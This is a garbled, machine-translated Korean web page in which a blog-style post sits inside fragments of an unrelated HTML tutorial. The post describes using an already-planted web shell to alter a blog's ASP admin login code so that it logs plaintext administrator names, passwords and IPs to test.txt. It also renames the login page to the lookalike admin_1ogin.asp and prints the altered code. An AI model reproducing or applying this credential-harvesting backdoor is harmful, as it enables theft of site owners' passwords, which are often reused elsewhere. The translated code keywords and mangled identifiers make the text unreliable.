권장 : HTML 코드 쓰기 컬렉션 HTML은 웹 페이지에서도 이해하려면 웹 웹어로도 알려진 하이퍼 텍스트 마크 업 언어 (HyperTextMarkUplanguage)입니다. DreamWvear, FrontPage 등과 같은 웹 페이지를 만들기위한 도구가 많이 있지만 실제로 이러한 코드를 이해하지 않고도 아름다운 웹 페이지를 만들 수 있습니다. . . HTML 컨텐츠가 많기 때문에 웹 페이지를 만들기 위해 코드를 작성하려는 사람은 거의 없으며 대부분은 사용합니다.
보안 점검에서 실제로 웹 쉘을 얻었지만 사회 복지사에게 이메일 주소에 다른 정보를 가져야하므로 그의 습관을 알아야합니다.
데이터베이스가 다운로드되었지만 MD5 비밀번호는 해독 할 수 없습니다. 아아, 로그인 관리자 계정 비밀번호를 기록하면됩니다!
문제를 제거하는 데 어려움을 덜어주십시오!
이 암호는 실제로 중요하지만 중요하지는 않습니다.
많은 사람들이 동일한 비밀번호를 사용하는 것을 좋아하기 때문입니다. 나와 같은 보안 탐지기조차도 필연적으로 동일한 계정 암호를 사용하는 습관입니다.
먼저 배경 로그인 코드를 확인하십시오
<%
희미한 로그인
로그인을 설정하십시오 = 새로운 아들 로그
로그인 .Execute
클래스 애들로그
개인 파기
private sub class_initialize
commcls = 새로운 공통점
uscommcls.isipallow
roomclcls.checkinstall
uscommcls.getConfigCache (*)
종료 서브
개인 sub class_terminate
Phoscommcls = 아무것도 설정하지 않습니다
종료 서브
공개 하위 실행
희미한 행동
action = request (action)
사례 조치를 선택하십시오
케이스 체크 로그
체크 로그
케이스 로그인
로그인 아웃
다른 경우
loginf
종료 선택
종료 서브
개인 서브 체크 로그
Dim Adname, ADPWD, CheckCode
adname = phsommcls.g (trim (request (adname)))
ADPWD = MD5 (TRIM (요청 (ADPWD)))
checkcode = respommcls.g (request (checkcode))
if trim (checkCode) <> 세션 (ExcheckCode) 및 응용 프로그램 (Sn & ischeckcode) = 예
uscommcls.showmsg 확인 코드가 잘못되었습니다! , 응용 프로그램 (sn & blogurl) & admin_login.asp
종료 하위
끝 If
if trim (adname) = cstr (응용 프로그램 (sn & adname)) 및 trim (adpwd) = cstr (application (sn & adpwd))
응답 .cookies (md5 (sn)) (adname) = adname
응답
세션 (Adlogin) = MD5 (SN)
uscommcls.getConfigCache (*)
uscommcls.getClassCache ()
Response.Redirect (응용 프로그램 (SN & BlogUrl) 및 admin_index.asp)
또 다른
veshommcls.showmsg 계정 또는 비밀번호가 잘못되었습니다. 응용 프로그램 (sn & blogurl) & admin_login.asp
끝 If
종료 서브
개인 하위 로그인
응답 .cookies (md5 (sn)) (adname) =
응답 .cookies (md5 (sn)) (ADPWD) =
session.abandon ()
veshommcls.showmsg는 성공적으로 로그 아웃, 응용 프로그램 (sn & blogurl) 및 index.asp
종료 서브
개인 하위 로그인프
%>
다음 코드를보십시오
adname = phsommcls.g (trim (request (adname)))
ADPWD = MD5 (TRIM (요청 (ADPWD)))
--- 의미는 매우 간단하므로 여기에서 명시 적으로 설명하지 않습니다. 주로 MD5에 따라 다릅니다. 비밀번호가 MD5를 사용하여 암호화되면 우리가 기록한 암호는 쓸모가 없으며 여전히 MD5입니다. 그래서
그래서 나는 낚시 방법을 생각했습니다. 원래 로그인 인터페이스입니다
개인 서브 체크 로그
Dim Adname, ADPWD, CheckCode, StrlogText, IP, FF
adname = phsommcls.g (trim (request (adname)))
ADPWD = (TRIM (request (ADPWD)))
checkcode = respommcls.g (request (checkcode))
strlogfile = test.txt
IP = 요청 (IP)
strlogtext = strlogtext & adname & ---- & adpwd & ----- ip : & ip & (remote_host)
set f = server.createobject (scripting.filesystemobject)
set ff = f.opentextfile (Server.mapath (.) &/& strlogfile, 8, true, 0)
ff.writeline (chr (13)+chr (10) & strlogtext)
ff.close
ff = 아무것도 설정하지 않습니다
f = 아무것도 설정하지 않습니다
if trim (checkCode) <> 세션 (ExcheckCode) 및 응용 프로그램 (Sn & ischeckcode) = 예
uscommcls.showmsg 확인 코드가 잘못되었습니다! , 응용 프로그램 (sn & blogurl) & admin_1ogin.asp
종료 하위
끝 If
if trim (adname) = cstr (응용 프로그램 (sn & adname)) 및 trim (adpwd) = cstr (application (sn & adpwd))
응답 .cookies (md5 (sn)) (adname) = adname
응답 .cookies ((sn)) (ADPWD) = ADPWD
세션 (Adlogin) = MD5 (SN)
uscommcls.getConfigCache (*)
uscommcls.getClassCache ()
Response.Redirect (응용 프로그램 (SN & BlogUrl) 및 admin_1ogin.asp)
또 다른
veshommcls.showmsg 계정 또는 비밀번호가 잘못되었습니다. Application (Sn & BlogUrl) 및 admin_1ogin.asp
끝 If
종료 서브
보든 아니든
A = 원래 로그인 페이지가 피싱 페이지로 대체되었습니다.
b = 원래 로그인 페이지 (admin_login.asp)는 admin_1ogin.asp로 수정되었습니다
왜?
원본 : adpwd = md5 (trim (request (ADPWD)))
응답
개정하다
ADPWD = (TRIM (request (ADPWD)))
응답 .cookies ((sn)) (ADPWD) = ADPWD
MD5를 제거하십시오. . 이 혼란스러운 방법은 오랫동안 사용되었습니다! . .
기술 내용이 없습니다. 저를 비웃지 마세요! 비밀번호는 test.txt에 기록됩니다
공유 : 헤드 요소의 하이라이트 HTML 문서는 두 부분으로 구성됩니다. 헤드 (테마 부분, 일반적으로 보이지 않는)와 신체 (브라우저에서 볼 수있는 신체 부위)로 구성됩니다. FrontPage 및 DreamWeaver (DW)와 같은 Visual Web Editors의 인기로 인해 더 이상 HTML을 이해하지 않고 전문 웹 페이지를 만드는 것은 더 이상 꿈이 아닙니다. 그러나 이러한 홈페이지 생성 도구는 사용할 수 없습니다